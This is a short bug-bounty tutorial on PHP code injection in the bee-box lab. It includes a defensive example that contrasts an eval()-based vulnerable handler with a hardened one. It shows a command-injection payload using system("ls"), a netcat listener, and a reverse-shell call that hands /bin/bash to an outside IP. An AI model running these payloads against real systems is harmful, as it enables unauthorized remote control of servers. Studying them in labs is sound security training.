Bug Bounty Hunting – PHP Code Injection

PHP Code Injection

PHP code injection is a vulnerability that lets an attacker inject their own PHP code into the server-side scripting engine, where the server executes it as part of the application.

Tools we will be using

  • Bee-box

Getting started

  • If we click on the message, it echoes the data back, so we know the PHP code is executing correctly.
  • We can also see this in the URL, in the message parameter.
  • We can change the echoed message; however, if we try other data such as HTML tags (HTML injection) we get no output.
  • So we have established that the message is being processed by the server rather than rendered directly.
  • If we insert a PHP statement terminator (semicolon), we can execute further statements, for example with the PHP system call.

A great way of taking advantage of PHP code injection is by using the system call:

Message=Data;system("ls");
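To show why the semicolon works, here is an added example (not bee-box's own source): a handler that splices the message parameter into an echo statement and passes it to eval(), beside a hardened handler that treats the parameter only as data. The function names and the allow-list pattern are assumptions for this illustration.

```php
<?php
// Added illustration, not bee-box's own code. Two handlers for the same
// "message" parameter: one that builds PHP source from it, one that does not.

// VULNERABLE: the parameter is spliced into source code and evaluated.
// With Message=Data;system("ls"); the generated code is
//     echo Data;system("ls");;
// The ';' after Data ends the echo statement, so the rest runs as a second
// statement. (bee-box's old PHP treats the bare word Data as the string
// "Data"; PHP 8 raises an undefined-constant Error instead.)
// Kept only for comparison; it is not wired to the request below.
function render_vulnerable(string $message): string
{
    ob_start();
    eval('echo ' . $message . ';');
    return (string) ob_get_clean();
}

// HARDENED: no source code is built from input. The parameter stays data and
// is HTML-encoded on output, which also closes the HTML-injection path.
function render_safe(string $message): string
{
    return htmlspecialchars($message, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Defence in depth (assumed policy): an allow-list that rejects statement
// terminators, parentheses and quotes before the value reaches any sink.
function is_plain_message(string $message): bool
{
    return preg_match('/^[A-Za-z0-9 _.,!?-]{1,200}$/', $message) === 1;
}

$message = $_REQUEST['Message'] ?? 'Hello';

if (!is_plain_message($message)) {
    http_response_code(400);
    exit('Invalid message');
}

echo '<p>' . render_safe($message) . '</p>';
```

A request log filter that flags a `;` followed by a function call in this parameter catches the probing stage described above before the reverse shell step.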

Getting a reverse shell

  • Set up a netcat listener – nc -nvlp 1234
  • Execute nc with the system call – system("nc 192.168.1.101 1234 -e /bin/bash");